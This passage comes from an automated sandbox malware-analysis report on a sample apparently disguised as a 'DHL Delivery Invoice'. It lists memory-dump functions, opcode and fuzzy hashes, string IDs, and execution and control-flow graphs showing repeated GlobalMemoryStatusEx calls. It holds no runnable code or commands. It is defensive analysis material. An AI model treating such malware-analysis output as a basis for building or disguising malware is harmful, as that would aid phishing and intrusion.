                                                                                                                                  • Instruction Fuzzy Hash: 16212571500204DFDF25DF14D9C0B26BF66FB98325F24C169ED494B25AC33AE85ACAB2
                                                                                                                                  Function 00D6D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1824421155.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_d6d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7a52aad66b21602e30c429ca16fef027ee93009beca535d57f6b9866f6e949cb
                                                                                                                                  • Instruction ID: d64dc52d5abb9112ee9d2d8739dbebe98c76e28d962de4a0b7fccf4e5ac42a0a
                                                                                                                                  • Opcode Fuzzy Hash: 7a52aad66b21602e30c429ca16fef027ee93009beca535d57f6b9866f6e949cb
                                                                                                                                  • Instruction Fuzzy Hash: 1921F275A04240DFCB14DF14E984B26BBA6EB88314F24C569E84A4B296C33BD847CAB1
                                                                                                                                  Function 00D6D39C Relevance: .1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1824421155.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_d6d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 13114ef89c79a8ceb7f7c22efb32501df054cf1ee4ff83466d743aeb59bdf5b7
                                                                                                                                  • Instruction ID: cb42b78ee76d89c6f448d01ab45b678cbf4ba369bd3ac58e2fba3fd83d308893
                                                                                                                                  • Opcode Fuzzy Hash: 13114ef89c79a8ceb7f7c22efb32501df054cf1ee4ff83466d743aeb59bdf5b7
                                                                                                                                  • Instruction Fuzzy Hash: 6121F2B1A44204DFCB04DF14E9C4B26BBA6EB84314F24C56DD9494B396C73AE846CA72
                                                                                                                                  Function 00D6D005 Relevance: .1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1824421155.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_d6d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7bb609f7dafee196eeef9619cb1b4ed5ff3f8bdb688283beb9f1d1950c18395f
                                                                                                                                  • Instruction ID: e78582fb309b2a8dae42ca3af5720f606e5ad4e1dfed664ce4259ca6fcc3090c
                                                                                                                                  • Opcode Fuzzy Hash: 7bb609f7dafee196eeef9619cb1b4ed5ff3f8bdb688283beb9f1d1950c18395f
                                                                                                                                  • Instruction Fuzzy Hash: 912150755093808FDB12CF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                                                                                                                                  Function 00D5D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1824354281.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_d5d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                  • Instruction ID: 7209486c6df5024fd7150b03f0f9aecd5ed57e47039c2f1e5d740f88515f378c
                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                  • Instruction Fuzzy Hash: BA11CD72404240CFDF16CF00D5C4B16BF62FB94324F28C2A9DC090A256C33AE85ACBA1
                                                                                                                                  Function 00D6D397 Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1824421155.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_d6d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction ID: 8c5b47043aeb4bb062f7503dbc740b5b2c47f0ee7c8e82ecf6db81791935e94c
                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction Fuzzy Hash: 22119075A04284DFDB05CF14E5C4B15BF62FB84314F28C6ADD8494B656C33AE84ACB61

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 02AA5AE8 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: *w$*w
                                                                                                                                  • API String ID: 0-2919693051
                                                                                                                                  • Opcode ID: 28a716a60f7b1554b3fde21e3db1eb2dda4a1c8da6ca62848b0d7c8649b129d1
                                                                                                                                  • Instruction ID: 12f701873ce822622d1127c8b9c330de8994aff8f6f0bd7f1925fbdcdce3ed1f
                                                                                                                                  • Opcode Fuzzy Hash: 28a716a60f7b1554b3fde21e3db1eb2dda4a1c8da6ca62848b0d7c8649b129d1
                                                                                                                                  • Instruction Fuzzy Hash: EC41D8B0E0560ADFCB44CFAAC5915AEFBF2BF89300F64D46AC515A7214E7349A41CF98
                                                                                                                                  Function 02AA5AF8 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: *w$*w
                                                                                                                                  • API String ID: 0-2919693051
                                                                                                                                  • Opcode ID: d6bf83afd9a4635effcb46fef3ef98c2f7f0b2dde9fb4955f9b6ec2f20949efb
                                                                                                                                  • Instruction ID: b6ea982943c71187a2aba82397b85c7cc19c6e3cfeb14c0db875640778ef4950
                                                                                                                                  • Opcode Fuzzy Hash: d6bf83afd9a4635effcb46fef3ef98c2f7f0b2dde9fb4955f9b6ec2f20949efb
                                                                                                                                  • Instruction Fuzzy Hash: BD41E7B0E0160ADBCB44CFAAC5515AEFBF2BF88300F64D46AD515B7214EB349A41CF98
                                                                                                                                  Function 097E2B60 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'kq
                                                                                                                                  • API String ID: 0-3255046985
                                                                                                                                  • Opcode ID: b4bc1cceecbec2ad5b197f8bd9878b19264ca3a2dcefe4643f20eee936887167
                                                                                                                                  • Instruction ID: a736618b989e31fc4166b622bc52fa5d53c07b241e3ecb8b601a52d90a02642a
                                                                                                                                  • Opcode Fuzzy Hash: b4bc1cceecbec2ad5b197f8bd9878b19264ca3a2dcefe4643f20eee936887167
                                                                                                                                  • Instruction Fuzzy Hash: C0714E70E002098FDB4CEF6EE84169ABBF6FB88344F14D129D4059B269EF785905CB94
                                                                                                                                  Function 097E2B70 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'kq
                                                                                                                                  • API String ID: 0-3255046985
                                                                                                                                  • Opcode ID: 5e26f2b71b9166ef6cff1503b9250629a96b328ee23f04190666a5039ba7ee76
                                                                                                                                  • Instruction ID: 1c60e5cfabce5b43517ce47e954862e1476f3a31b668434cb73446c4a022f8a8
                                                                                                                                  • Opcode Fuzzy Hash: 5e26f2b71b9166ef6cff1503b9250629a96b328ee23f04190666a5039ba7ee76
                                                                                                                                  • Instruction Fuzzy Hash: F6613D70E002098FDB08DF6EE94169ABBF6FB88344F14D529D4059B369EF7859098B94
                                                                                                                                  Function 02AA56E8 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !yqo
                                                                                                                                  • API String ID: 0-2311287014
                                                                                                                                  • Opcode ID: afd646740b8232c5a5a52b0c0c8a2893543e149c3845d751acfdebb174adefbb
                                                                                                                                  • Instruction ID: 3f6fffc76536a1287ba71a70005bdd01e4da1ff97977f446783880c5f3e472c0
                                                                                                                                  • Opcode Fuzzy Hash: afd646740b8232c5a5a52b0c0c8a2893543e149c3845d751acfdebb174adefbb
                                                                                                                                  • Instruction Fuzzy Hash: C641C3B0D0420ADBDB44CFAAC9915AEBBF2AF88300F64D46AD415B7254E7349A42CF94
                                                                                                                                  Function 02AA56F8 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !yqo
                                                                                                                                  • API String ID: 0-2311287014
                                                                                                                                  • Opcode ID: 655fade3b360b9749d95d4e274e6933071160fdb7a41e7d6cce95b2d9ae6f718
                                                                                                                                  • Instruction ID: 5be6f38027eb603b4fc69b3fdcbb701bb1f5db493610b1c8461dcb82fb9be1a9
                                                                                                                                  • Opcode Fuzzy Hash: 655fade3b360b9749d95d4e274e6933071160fdb7a41e7d6cce95b2d9ae6f718
                                                                                                                                  • Instruction Fuzzy Hash: 5341D7B4D0420ADBCB44CFAAC9915AEFBF2BF88300F54D469D515B7254D7349A42CF94
                                                                                                                                  Function 097ED8E0 Relevance: .3, Instructions: 322COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 47a79c8e7e55a233f31ffd049305e2f0bb884e09cf177edba6a2562a181c19f3
                                                                                                                                  • Instruction ID: 8b80fecbc7d46371d34c3ee320685449906882535165733fadb3b5bc2a2a4cca
                                                                                                                                  • Opcode Fuzzy Hash: 47a79c8e7e55a233f31ffd049305e2f0bb884e09cf177edba6a2562a181c19f3
                                                                                                                                  • Instruction Fuzzy Hash: ACE10875E002198FCB14DFA9C5809AEFBB2FF89304F24916AE415AB366D734AD41CF60
                                                                                                                                  Function 09830040 Relevance: .3, Instructions: 312COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f51af95448832b28ed39439535d25920bd5ad5929d0179b2ca6dc7f5c972a784
                                                                                                                                  • Instruction ID: e63a115379fa21bec7931d1ba38a40cdecfff81a6d6d41393096a58798167532
                                                                                                                                  • Opcode Fuzzy Hash: f51af95448832b28ed39439535d25920bd5ad5929d0179b2ca6dc7f5c972a784
                                                                                                                                  • Instruction Fuzzy Hash: 01E1D674E002198FCB14DFA9C5809AEBBB2FF89304F64D169E414AB356DB34AD41CFA5
                                                                                                                                  Function 09830550 Relevance: .3, Instructions: 312COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 801ab6f4127bf84c144d877aa3587ec16e2ecdf07c9d32154487c03dd186b816
                                                                                                                                  • Instruction ID: 7f89ab202c6517b9dee4858fa4cf8457062203c37e228108e6ae81938a78d9ba
                                                                                                                                  • Opcode Fuzzy Hash: 801ab6f4127bf84c144d877aa3587ec16e2ecdf07c9d32154487c03dd186b816
                                                                                                                                  • Instruction Fuzzy Hash: F9E1F874E012198FCB14DFA9C5809AEBBB2FF89304F24D269E415AB356D735AD41CFA0
                                                                                                                                  Function 097EDD38 Relevance: .3, Instructions: 312COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 47ca88718a39785e820ed8c7b759209bc9b39d572aaf1a6b25f31fa6578bd037
                                                                                                                                  • Instruction ID: 5fff37daa364a5fdae162f31d8cd0e541f84598fbe68599ab8573b78f2cefb99
                                                                                                                                  • Opcode Fuzzy Hash: 47ca88718a39785e820ed8c7b759209bc9b39d572aaf1a6b25f31fa6578bd037
                                                                                                                                  • Instruction Fuzzy Hash: EBE1F675E002198FCB14DFA9C5809AEFBB2FF89304F249169E414AB356DB34AD41CFA4
                                                                                                                                  Function 097EE170 Relevance: .3, Instructions: 312COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3b214da789988c0e6cd981754326246f42b5ffd99eda275e4d8f70ca94f33ecf
                                                                                                                                  • Instruction ID: bb13e111606cfb3b0c94418201b39d4b2485e26098426630e5495a5036cfc4d5
                                                                                                                                  • Opcode Fuzzy Hash: 3b214da789988c0e6cd981754326246f42b5ffd99eda275e4d8f70ca94f33ecf
                                                                                                                                  • Instruction Fuzzy Hash: 83E1F675E002198FCB14DFA9C5809AEFBB2FF89304F249569E414AB356DB30AD41CF65
                                                                                                                                  Function 02AA4FF0 Relevance: .2, Instructions: 166COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5b08d8859af70f24fd38b08ddb3288bdd90dbe4e25c02235cbd074eea578b4a9
                                                                                                                                  • Instruction ID: 5dd5f15716f697980533fdad8e044eb602f0189ca2d509fa98a46f7a2c135c63
                                                                                                                                  • Opcode Fuzzy Hash: 5b08d8859af70f24fd38b08ddb3288bdd90dbe4e25c02235cbd074eea578b4a9
                                                                                                                                  • Instruction Fuzzy Hash: 3E715A74D0420ACFCB04DFA9D4919AEFBB2FF49310F54941AD415A7315DB34AA82CF98
                                                                                                                                  Function 02AA4FE0 Relevance: .2, Instructions: 164COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f4d8536ddaece0857f985530db07eeaab45647634e1338d8dc291f89decb8ec
                                                                                                                                  • Instruction ID: 35c05b6fd2fd28f50b3e765ffdfafe2aff72d1398ad6ed4477a4516cf529cfd8
                                                                                                                                  • Opcode Fuzzy Hash: 0f4d8536ddaece0857f985530db07eeaab45647634e1338d8dc291f89decb8ec
                                                                                                                                  • Instruction Fuzzy Hash: 16614774E0520ACFCB04DFA9C4919AEFBB2FF49310F54952AD415A7315DB34AA82CF98
                                                                                                                                  Function 02AA2148 Relevance: .2, Instructions: 162COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f728eda916d4e6be9e5e010fc995649f9f40b8b16140b7d329cce76ad59fdb92
                                                                                                                                  • Instruction ID: 5c5025a87e7869a1e57a2f599ccef1b09273286510e969cbfef24d3efdeb0197
                                                                                                                                  • Opcode Fuzzy Hash: f728eda916d4e6be9e5e010fc995649f9f40b8b16140b7d329cce76ad59fdb92
                                                                                                                                  • Instruction Fuzzy Hash: AF613674E01209DFCB04CF99D490AEEFBB1FF88310F149569E915AB250D7309A96CFA4
                                                                                                                                  Function 02AA58B0 Relevance: .2, Instructions: 155COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c5fb9a4b0318f4ae4b95bf84e039bf7ba331ed3febdf0096e4ed353ab10b3429
                                                                                                                                  • Instruction ID: 4519407afe1eabcb8f32e342d478c8d894ec4f09f7da914d326fd78f2e2f28c0
                                                                                                                                  • Opcode Fuzzy Hash: c5fb9a4b0318f4ae4b95bf84e039bf7ba331ed3febdf0096e4ed353ab10b3429
                                                                                                                                  • Instruction Fuzzy Hash: BC61E274E15219DFCB48CFAAC9805DEFBF2BF89210F64952AD415BB214D7309A41CF68
                                                                                                                                  Function 02AA58A0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 973a7befa3b69734d74d4c5a90572402de06095fa17d0fdd6a863bcdb04d6933
                                                                                                                                  • Instruction ID: 6019b75852195d7b239c50d3c04293032d64d98fa38c97f9d1013de0c6b6b7c0
                                                                                                                                  • Opcode Fuzzy Hash: 973a7befa3b69734d74d4c5a90572402de06095fa17d0fdd6a863bcdb04d6933
                                                                                                                                  • Instruction Fuzzy Hash: E6610374E052199FCB44CFA9C9809DEFBF2BF89210F64952AD405BB314D7309A42CF68
                                                                                                                                  Function 02AA0870 Relevance: .1, Instructions: 98COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e9841e2323e069323a7c50474283226a838666cbb591e4b4245a5ba2ddd20e52
                                                                                                                                  • Instruction ID: d4bdd0bdd6871bd32efa93b2f8b80847b579886317e789ec3b50380c0579117b
                                                                                                                                  • Opcode Fuzzy Hash: e9841e2323e069323a7c50474283226a838666cbb591e4b4245a5ba2ddd20e52
                                                                                                                                  • Instruction Fuzzy Hash: 2A41EA70E016189FDB58CF6AD94079EFBB3AFC9300F04D0AAD508AB225EB305985CF55

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:9.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:44
                                                                                                                                  Total number of Limit Nodes:6
                                                                                                                                  execution_graph 41600 e80848 41602 e8084e 41600->41602 41601 e8091b 41602->41601 41605 e81488 41602->41605 41610 e81380 41602->41610 41606 e81396 41605->41606 41607 e81484 41606->41607 41608 e81488 GlobalMemoryStatusEx 41606->41608 41615 e87ea8 41606->41615 41607->41602 41608->41606 41612 e8138f 41610->41612 41611 e81484 41611->41602 41612->41611 41613 e87ea8 GlobalMemoryStatusEx 41612->41613 41614 e81488 GlobalMemoryStatusEx 41612->41614 41613->41612 41614->41612 41616 e87eb2 41615->41616 41617 e87ecc 41616->41617 41620 653fa98 41616->41620 41625 653fa88 41616->41625 41617->41606 41622 653faad 41620->41622 41621 653fcc2 41621->41617 41622->41621 41623 653ff2b GlobalMemoryStatusEx 41622->41623 41624 653fcd9 GlobalMemoryStatusEx 41622->41624 41623->41622 41624->41622 41629 653fa98 41625->41629 41626 653fcc2 41626->41617 41627 653ff2b GlobalMemoryStatusEx 41627->41629 41628 653fcd9 GlobalMemoryStatusEx 41628->41629 41629->41626 41629->41627 41629->41628 41630 e8fef8 41631 e8ff20 41630->41631 41633 e8ff90 41631->41633 41634 653ff2b 41631->41634 41636 653ff42 41634->41636 41637 653fd09 41634->41637 41635 653fd66 41635->41633 41636->41633 41637->41635 41641 e8e6f8 41637->41641 41644 e8e708 41637->41644 41638 653fe3f 41638->41633 41647 e8eb30 41641->41647 41642 e8e716 41642->41638 41645 e8e716 41644->41645 41646 e8eb30 GlobalMemoryStatusEx 41644->41646 41645->41638 41646->41645 41648 e8eb4d 41647->41648 41649 e8eb75 41647->41649 41648->41642 41650 e8eb96 41649->41650 41651 e8ec5e GlobalMemoryStatusEx 41649->41651 41650->41642 41652 e8ec8e 41651->41652 41652->41642

                                                                                                                                  Executed Functions

                                                                                                                                  Function 065330E0 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 130 65330e0-6533101 131 6533103-6533106 130->131 132 6533108-6533127 131->132 133 653312c-653312f 131->133 132->133 134 65338d0-65338d2 133->134 135 6533135-6533154 133->135 137 65338d4 134->137 138 65338d9-65338dc 134->138 143 6533156-6533159 135->143 144 653316d-6533177 135->144 137->138 138->131 139 65338e2-65338eb 138->139 143->144 145 653315b-653316b 143->145 148 653317d-653318c 144->148 145->148 256 653318e call 6533900 148->256 257 653318e call 65338f8 148->257 149 6533193-6533198 150 65331a5-6533482 149->150 151 653319a-65331a0 149->151 172 65338c2-65338cf 150->172 173 6533488-6533537 150->173 151->139 182 6533560 173->182 183 6533539-653355e 173->183 184 6533569-653357c 182->184 183->184 187 6533582-65335a4 184->187 188 65338a9-65338b5 184->188 187->188 191 65335aa-65335b4 187->191 188->173 189 65338bb 188->189 189->172 191->188 192 65335ba-65335c5 191->192 192->188 193 65335cb-65336a1 192->193 205 65336a3-65336a5 193->205 206 65336af-65336df 193->206 205->206 210 65336e1-65336e3 206->210 211 65336ed-65336f9 206->211 210->211 212 65336fb-65336ff 211->212 213 6533759-653375d 211->213 212->213 216 6533701-653372b 212->216 214 6533763-653379f 213->214 215 653389a-65338a3 213->215 226 65337a1-65337a3 214->226 227 65337ad-65337bb 214->227 215->188 215->193 223 6533739-6533756 216->223 224 653372d-653372f 216->224 223->213 224->223 226->227 230 65337d2-65337dd 227->230 231 65337bd-65337c8 227->231 234 65337f5-6533806 230->234 235 65337df-65337e5 230->235 231->230 236 65337ca 231->236 240 6533808-653380e 234->240 241 653381e-653382a 234->241 237 65337e7 235->237 238 65337e9-65337eb 235->238 236->230 237->234 238->234 242 6533812-6533814 240->242 243 6533810 240->243 245 6533842-6533893 241->245 246 653382c-6533832 241->246 242->241 243->241 245->215 247 6533836-6533838 246->247 248 6533834 246->248 247->245 248->245 256->149 257->149
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: a5627848dacfd73158babbc06542d8261599f99b3fdcd3fd34b03d929166d463
                                                                                                                                  • Instruction ID: 6f3cd6191dc1292a496d183dbcd5d97630476fddfba0b206289667dc19e5b31e
                                                                                                                                  • Opcode Fuzzy Hash: a5627848dacfd73158babbc06542d8261599f99b3fdcd3fd34b03d929166d463
                                                                                                                                  • Instruction Fuzzy Hash: 02321F31E1065ACFCB14EF65D99459DF7B2BFD9300F20C6A9D409A7264EB30A985CF90
                                                                                                                                  Function 06537DD8 Relevance: 3.0, Strings: 2, Instructions: 472COMMON
                                                                                                                                  Download Yara Rule

